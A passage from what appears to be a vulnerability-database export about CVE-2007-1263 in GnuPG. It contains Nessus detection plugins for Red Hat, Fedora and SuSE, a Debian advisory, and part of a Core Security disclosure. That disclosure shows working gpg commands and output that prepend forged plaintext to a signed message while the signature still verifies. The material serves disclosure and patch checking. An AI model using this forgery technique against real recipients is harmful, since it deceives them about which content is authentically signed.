Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(25320);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-1263\");\n script_bugtraq_id(22757);\n script_xref(name:\"RHSA\", value:\"2007:0107\");\n\n script_name(english:\"RHEL 5 : gnupg (RHSA-2007:0107)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated GnuPG packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nGnuPG is a utility for encrypting data and creating digital\nsignatures.\n\nGerardo Richarte discovered that a number of applications that make\nuse of GnuPG are prone to a vulnerability involving incorrect\nverification of signatures and encryption. An attacker could add\narbitrary content to a signed message in such a way that a receiver of\nthe message would not be able to distinguish between the properly\nsigned parts of a message and the forged, unsigned, parts.\n(CVE-2007-1263)\n\nWhilst this is not a vulnerability in GnuPG itself, the GnuPG team\nhave produced a patch to protect against messages with multiple\nplaintext packets. Users should update to these erratum packages which\ncontain the backported patch for this issue.\n\nRed Hat would like to thank Core Security Technologies for reporting\nthis issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1263\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2007:0107\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected gnupg package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gnupg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/05/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0107\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"gnupg-1.4.5-13\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"gnupg-1.4.5-13\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"gnupg-1.4.5-13\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gnupg\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-12T10:06:09", "description": "This updates GnuPG to version 1.4.7, changing the default behavior so\nthat gnupg now flags message streams which contain multiple plaintexts\nas an error. This prevents errors which would occur when applications\nwhich called gnupg assumed that this was already the default behavior.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2007-03-16T00:00:00", "title": "Fedora Core 5 : gnupg-1.4.7-1 (2007-316)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1263"], "modified": "2007-03-16T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:gnupg", "cpe:/o:fedoraproject:fedora_core:5", "p-cpe:/a:fedoraproject:fedora:gnupg-debuginfo"], "id": "FEDORA_2007-316.NASL", "href": "https://www.tenable.com/plugins/nessus/24822", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2007-316.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24822);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2007-1263\");\n script_xref(name:\"FEDORA\", value:\"2007-316\");\n\n script_name(english:\"Fedora Core 5 : gnupg-1.4.7-1 (2007-316)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This updates GnuPG to version 1.4.7, changing the default behavior so\nthat gnupg now flags message streams which contain multiple plaintexts\nas an error. This prevents errors which would occur when applications\nwhich called gnupg assumed that this was already the default behavior.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2007-March/001554.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?60f7db61\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gnupg and / or gnupg-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnupg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnupg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/03/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 5.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC5\", reference:\"gnupg-1.4.7-1\")) flag++;\nif (rpm_check(release:\"FC5\", reference:\"gnupg-debuginfo-1.4.7-1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gnupg / gnupg-debuginfo\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-17T14:02:12", "description": "When printing a text stream with a GPG signature it was possible for\nan attacker to create a stream with 'unsigned text, signed text' where\nboth unsigned and signed text would be shown without distinction which\none was signed and which part wasn't.\n\nThis is tracked by the Mitre CVE ID CVE-2007-1263.\n\nThe update introduces a new option --allow-multiple-messages to print\nout such messages in the future, by default it only prints and handles\nthe first one.", "edition": 24, "published": "2009-09-24T00:00:00", "title": "SuSE9 Security Update : gpg (YOU Patch Number 11464)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1263"], "modified": "2009-09-24T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_11464.NASL", "href": "https://www.tenable.com/plugins/nessus/41120", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41120);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-1263\");\n\n script_name(english:\"SuSE9 Security Update : gpg (YOU Patch Number 11464)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"When printing a text stream with a GPG signature it was possible for\nan attacker to create a stream with 'unsigned text, signed text' where\nboth unsigned and signed text would be shown without distinction which\none was signed and which part wasn't.\n\nThis is tracked by the Mitre CVE ID CVE-2007-1263.\n\nThe update introduces a new option --allow-multiple-messages to print\nout such messages in the future, by default it only prints and handles\nthe first one.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-1263.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 11464.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"gpg-1.2.4-68.25\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "debian": [{"lastseen": "2020-11-11T13:17:36", "bulletinFamily": "unix", "cvelist": ["CVE-2007-1263"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1266-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nMarch 13th, 2007 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : gnupg\nVulnerability : several\nProblem-Type : local(remote)\nDebian-specific: no\nCVE ID : CVE-2007-1263\nDebian Bug : 413922 414170\n\nGerardo Richarte discovered that GnuPG, a free PGP replacement, provides\ninsufficient user feedback if an OpenPGP message contains both unsigned\nand signed portions. Inserting text segments into an otherwise signed\nmessage could be exploited to forge the content of signed messages.\nThis update prevents such attacks; the old behaviour can still be\nactivated by passing the --allow-multiple-messages option.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 1.4.1-1.sarge7.\n\nFor the upcoming stable distribution (etch) these problems have been\nfixed in version 1.4.6-2.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 1.4.6-2.\n\nWe recommend that you upgrade your gnupg packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge7.dsc\n Size/MD5 checksum: 680 7f02659abf22fc4d8cd5537d3cd88d64\n http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge7.diff.gz\n Size/MD5 checksum: 24290 3baa58f381c8508e8826b11625e4719d\n http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1.orig.tar.gz\n Size/MD5 checksum: 4059170 1cc77c6943baaa711222e954bbd785e5\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge7_alpha.deb\n Size/MD5 checksum: 2156494 f6a5a926159e22ff1b915b578aee79e9\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge7_amd64.deb\n Size/MD5 checksum: 1963978 071d87e7ca69d520cbf0993e90a26b0c\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge7_arm.deb\n Size/MD5 checksum: 1900000 607cd3b74c53945b6345594490ae09e7\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge7_hppa.deb\n Size/MD5 checksum: 2004634 f3d85ad41dc35f203d655962f2f19f0f\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge7_i386.deb\n Size/MD5 checksum: 1909476 fe9933fd968ae8242f26094e1314ce1b\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge7_ia64.deb\n Size/MD5 checksum: 2326178 e082e9a2b0ec22089a9a2e37a7d49b55\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge7_m68k.deb\n Size/MD5 checksum: 1811574 a778d48de1b914fbaf9132d707f3980e\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge7_mips.deb\n Size/MD5 checksum: 2001516 b3894d73eaa453aa16cce7963a94d169\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge7_mipsel.deb\n Size/MD5 checksum: 2008140 30692827e1d8b0877d73dcf555b56d57\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge7_powerpc.deb\n Size/MD5 checksum: 1958420 8ccf53ca0a1b4afeffedd6df10067ddc\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge7_s390.deb\n Size/MD5 checksum: 1967612 6baf699e3108a6a97bdb8ffb26e67bae\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge7_sparc.deb\n Size/MD5 checksum: 1897992 2b92e27ded545d9e1d89a7b2e89b5459\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 7, "modified": "2007-03-13T00:00:00", "published": "2007-03-13T00:00:00", "id": "DEBIAN:DSA-1266-1:A92B6", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00021.html", "title": "[SECURITY] [DSA 1266-1] New gnupg packages fix signature forgery", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "cvelist": ["CVE-2007-1269", "CVE-2007-1266", "CVE-2007-1265", "CVE-2007-1264", "CVE-2007-1263", "CVE-2007-1268", "CVE-2007-1267"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\n Core Security Technologies - CoreLabs Advisory\r\n http://www.coresecurity.com/corelabs/\r\n\r\n GnuPG and GnuPG clients unsigned data injection vulnerability\r\n\r\n\r\n\r\nDate Published: 2007-03-05\r\n\r\nLast Update: 2007-03-05\r\n\r\nAdvisory ID: CORE-2007-0115\r\n\r\nBugtraq IDs:\r\n BID 22757 - GnuPG\r\n BID 22758 - Enigmail\r\n BID 22759 - KMail\r\n BID 22760 - Evolution\r\n BID 22777 - Sylpheed\r\n BID 22778 - Mutt\r\n BID 22779 - GNUMail\r\n\r\nCVE Names:\r\n CVE-2007-1263 - for the visual distinction issues in GnuPG itself,\r\n all 4 attacks.\r\n CVE-2007-1264 - Enigmail improper use of --status-fd\r\n CVE-2007-1265 - KMail improper or non-existing use of --status-fd\r\n CVE-2007-1266 - Evolution improper or non-existing use of --status-fd\r\n CVE-2007-1267 - Sylpheed improper or non-existing use of --status-fd\r\n CVE-2007-1268 - Mutt improper or non-existing use of --status-fd\r\n CVE-2007-1269 - GNUMail improper or non-existing use of --status-fd\r\n\r\nTitle: GnuPG and GnuPG clients unsigned data injection vulnerability\r\n\r\nClass: Implementation Error\r\n\r\nRemotely Exploitable: Yes\r\n\r\nLocally Exploitable: Yes\r\n\r\nAdvisory URL:\r\n http://www.coresecurity.com/?action=item&id=1687\r\n\r\nVendors contacted:\r\n\r\nGnuPG\r\n. Core notification: 2007-02-01\r\n. Notification acknowledged by GnuPG maintainers: 2007-02-02\r\n. Technical details sent by Core: 2007-02-05\r\n. GnuPG response (incorrect use of GnuPG): 2007-02-14\r\n. GnuPG states that they will issue a patch: 2007-02-20\r\n. Patch received from the GnuPG team: 2007-02-20\r\n. GnuPG develops a patch for GPGME: 2007-02-26\r\n. New version of GnuPG and GPGME released: 2007-03-05\r\n\r\nEnigmail\r\n. Core notification: 2007-02-15\r\n. Technical details sent by Core: 2007-02-15\r\n. Notification acknowledged by Enigmail: 2007-02-16\r\n. Issue reproduced and confirmed by Enigmail: 2007-02-19\r\n. Enigmail develops a working patch: 2007-02-20\r\n\r\nKMail\r\n. Core notification: 2007-02-23\r\n. Notification acknowledged by KMail: 2007-02-24\r\n. Technical details sent by Core: 2007-02-26\r\n\r\nEvolution\r\n. Core notification: 2007-02-23\r\n\r\nSylpheed\r\n. Core notification: 2007-02-23\r\n\r\nMutt\r\n. Core notification: 2007-02-23\r\n. Notification acknowledged by Mutt: 2007-02-24\r\n. Technical details sent by Core: 2007-02-26\r\n\r\nGNUMail\r\n. Core notification: 2007-02-23\r\n. Notification acknowledged by GNUMail: 2007-02-23\r\n. Technical details sent by Core: 2007-02-26\r\n\r\nRelease Mode: COORDINATED RELEASE\r\n\r\n\r\n*Vulnerability Description*\r\n\r\n Scripts and applications using GnuPG are prone to a vulnerability in how\r\n signature verification information is shown to the end user.\r\n\r\n An attacker is able to add arbitrary content to a signed message.\r\n The receiver of the message (using a mail client such as Enigmail\r\n to read the message) will not be able to distinguish the forged and the\r\n properly signed parts of the message.\r\n\r\n This problem derives from the fact that a valid OpenPGP message can\r\n include multiple portions, each of them in turn considered a message but\r\n some of which may or may not be signed and/or encrypted. Vulnerable third\r\n party applications do not use the appropriate GnuPG API to determine\r\n message boundaries and do not explicitly differentiate messages in their\r\n output to end users.\r\n\r\n In some cases, and depending on how GnuPG is used, even an advanced user\r\n directly using GnuPG from the command line may be fooled by this attack.\r\n\r\n It's important to note that this IS NOT a cryptographic problem, but\r\n rather a problem on how information is shown to the user and how third-party\r\n applications and GnuPG interact with each other.\r\n\r\n*Vulnerable Packages*\r\n\r\n GnuPG 1.4.6 and previous versions.\r\n\r\n Enigmail 0.94.2 and previous versions.\r\n\r\n KMail 1.9.5 and previous versions.\r\n\r\n Evolution 2.8.1 and previous versions.\r\n\r\n Sylpheed 2.2.7 and previous versions.\r\n\r\n Mutt 1.5.13 and previous versions.\r\n\r\n GNUMail 1.1.2 and previous versions.\r\n\r\n Other scripts and applications using GnuPG may be vulnerable.\r\n\r\n\r\n*Solution/Vendor Information/Workaround*\r\n\r\n The following versions of GnuPG and GPGME resolve this issue:\r\n GnuPG 1.4.7\r\n GPGME 1.1.4\r\n\r\n They can be downloaded from: http://www.gnupg.org/download/\r\n\r\n The fixed versions enforce a limit of processing only one message on each\r\n run so third party applications and direct GPG users can not be confused\r\n by multiple messages with different security properties being intermingled\r\n in the output without clear message boundaries.\r\n\r\n For application developers using GnuPG as backend, it's a must to make the\r\n application pay attention to the output of the "--status-fd" option.\r\n\r\n Workaround:\r\n\r\n If a signed message looks suspicious, the validity of the signature can\r\n be verified manually by invoking GnuPG from the command line and adding\r\n the special option "--status-fd", as described below, to gain extra\r\n information.\r\n\r\n\r\n*Credits*\r\n\r\n This vulnerability was found by Gerardo Richarte from Core Security\r\n Technologies.\r\n\r\n\r\n*Technical Description - Exploit/Concept Code*\r\n\r\n As explained by RFC2440, an OpenPGP message, as used by GnuPG, is composed\r\n of several packets. A packet is a chunk of data that has a tag specifying\r\n its meaning. An OpenPGP message consists of a number of packets. Some of\r\n those packets may contain other OpenPGP packets.\r\n\r\n The most common types are a plaintext packet inside a signature packet,\r\n or a plaintext packet inside a signature packet inside an encrypted packet.\r\n When two or more OpenPGP messages are concatenated together, a new\r\n valid (and longer) message is obtained, and GnuPG handles it without\r\n problem, processing packets and messages one after the other. Our\r\n attack takes advantage of this feature of GnuPG. (It's actually a real\r\n feature).\r\n\r\n A standard signed-only message can be represented as:\r\n\r\n Compressed (OnePassSignature + Literal(text) + Signature)\r\n\r\n When the message is also encrypted, the session key, and an extra\r\n encryption layer is added:\r\n\r\n PubKeyEncrypted + EncryptedData( Compressed ( ... ) )\r\n\r\n The message could be encrypted using symmetric crypto instead of public\r\n key:\r\n\r\n SimKeyEncrypted + EncryptedData( Compressed ( ... ) )\r\n\r\n If the message is sent on email, or some other 7-bit medium, it may\r\n be ASCII-armored by encoding it using base64 and then appending a\r\n base64-encoded crc24 of the hole.\r\n\r\n AsciiArmor(PubKeyEncrypted + EncryptedData( Compressed ( ... ) )\r\n\r\n Our attack consists in prepending a literal packet before a normal\r\n message, but inside the AsciiArmor if needed. We thought of several\r\n variants for this attack, and some more can be easily generated.\r\n\r\n There are four different ways to add text to a signed message, without\r\n invalidating the signature.\r\n\r\n*Attack Variant 1: Prepending plaintext to an only-signed message.\r\n\r\n This variant is the simplest, and consists on prepending a single Literal()\r\n packet to an existing message, resulting in, for example:\r\n\r\n Literal(bad_text) + Compressed( OnePassSignature + Literal(text) +\r\n Signature)\r\n\r\n When GnuPG processes this message, it first outputs <bad_text>, then\r\n outputs <text> and then verifies what's enclosed between the\r\n OnePassSignature and Signature packets, reporting that the signature is\r\n correct (for <text>). When GnuPG is used through standard input and\r\n standard output (as it is in most cases when it's used by other\r\n applications such as MUAs), no distinction or separation is shown in\r\n the output between the two texts, hence the application reading GnuPG's\r\n output has no way to decide if the original input consisted of several\r\n texts or just one correctly signed. And this is exactly the problem we\r\n found.\r\n\r\n Example:\r\n\r\n- ----------------\r\ngera@poxiran:~/gpg$ gpg -z9 --output signed.gpg --sign\r\n\r\nYou need a passphrase to unlock the secret key for\r\nuser: "Gerardo Richarte <gera@core-sdi.com>"\r\n1024-bit DSA key, ID 3944C2D0, created 1999-02-16\r\n\r\nThis text is signed, it's a simple text to use as an example.\r\n\r\ngera@poxiran:~/gpg$ gpg -z0 --output forged.gpg --store\r\nThis text is inserted by the attacker\r\ngera@poxiran:~/gpg$\r\ngera@poxiran:~/gpg$ cat forged.gpg signed.gpg >hoax.gpg\r\ngera@poxiran:~/gpg$ gpg <hoax.gpg\r\nThis text is inserted by the attacker\r\nThis text is signed, it's a simple text to use as an example.\r\ngpg: Signature made Thu 22 Feb 2007 05:33:40 PM ART using DSA key ID 3944C2D0\r\ngpg: Good signature from "Gerardo Richarte <gera@core-sdi.com>"\r\nPrimary key fingerprint: A390 1BBA 2C58 D679 5A71 86F9 404F 4B53 3944 C2D0\r\n\r\n- ----------------\r\n\r\n We can inspect the structure of the message using --list-packets.\r\n Although it doesn't show the nesting levels, it's a good help when\r\n trying these things:\r\n\r\n- ----------------\r\ngera@poxiran:~/gpg$ gpg --list-packets <hoax.gpg\r\n:literal data packet:\r\n mode b (62), created 1172176500, name="",\r\n raw data: 38 bytes\r\n:compressed packet: algo=1\r\n:onepass_sig packet: keyid 404F4B533944C2D0\r\n version 3, sigclass 00, digest 2, pubkey 17, last=1\r\n:literal data packet:\r\n mode b (62), created 1172176306, name="",\r\n raw data: 97 bytes\r\n:signature packet: algo 17, keyid 404F4B533944C2D0\r\n version 3, created 1172176420, md5len 5, sigclass 00\r\n digest algo 2, begin of digest 09 46\r\n data: [160 bits]\r\n data: [159 bits]\r\n- ----------------\r\n\r\n It's important to state here that GnuPG does offer an interface for\r\n applications to obtain additional information when using it through\r\n standard in and standard out, and this interface, when properly used, can\r\n prevent the attack described here (see the description of "--status-fd" in\r\n GnuPG documentation for more information). Using --status-fd is the\r\n officially recommended way to use GnuPG from another application.\r\n\r\n For example:\r\n\r\n- ----------------\r\ngera@poxiran:~/gpg$ gpg --status-fd 1 <hoax.gpg\r\n[GNUPG:] PLAINTEXT 62 1172176500\r\n[GNUPG:] PLAINTEXT_LENGTH 38\r\nThis text is inserted by the attacker\r\n[GNUPG:] PLAINTEXT 62 1172176306\r\n[GNUPG:] PLAINTEXT_LENGTH 97\r\nThis text is signed, it's a simple text to use as an example.\r\ngpg: Signature made Thu 22 Feb 2007 05:33:40 PM ART using DSA key ID 3944C2D0\r\n[GNUPG:] SIG_ID iaMH4I4KCsPrWmVvMh3y0MqlUd0 2007-02-22 1172176420\r\n[GNUPG:] GOODSIG 404F4B533944C2D0 